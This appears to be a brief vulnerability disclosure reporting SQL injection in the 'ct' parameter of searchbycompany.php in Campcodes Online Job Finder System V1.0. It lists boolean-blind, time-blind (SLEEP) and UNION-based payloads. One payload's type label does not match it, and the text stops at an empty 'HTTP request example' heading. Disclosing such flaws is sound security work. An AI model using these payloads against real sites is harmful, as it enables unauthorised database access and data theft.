Key information

Vulnerability description
Vulnerability type: SQL injection
Affected product: Campcodes Online Job Finder System V1.0
Affected file: /eris/searchbycompany.php
Version: V1.0

Submitter
Submitted by: hozz

Vulnerability details
Parameter: ct (GET)

Type: Boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: SLAIDM29' AND 8749=8749-- iQZq /' OR '/ OR '/'=' OR '/'='

Type: Time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: SLAIDM29' AND (SELECT 6232 FROM (SELECT(SLEEP(5))) jhWv) AND 'Ywls'='Ywls

Type: Error-based
Title: Generic UNION query (NULL) - 15 columns
Payload: SLAIDM29') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CURDATE()/*,2,3,4,5,6,7,8,9

HTTP request example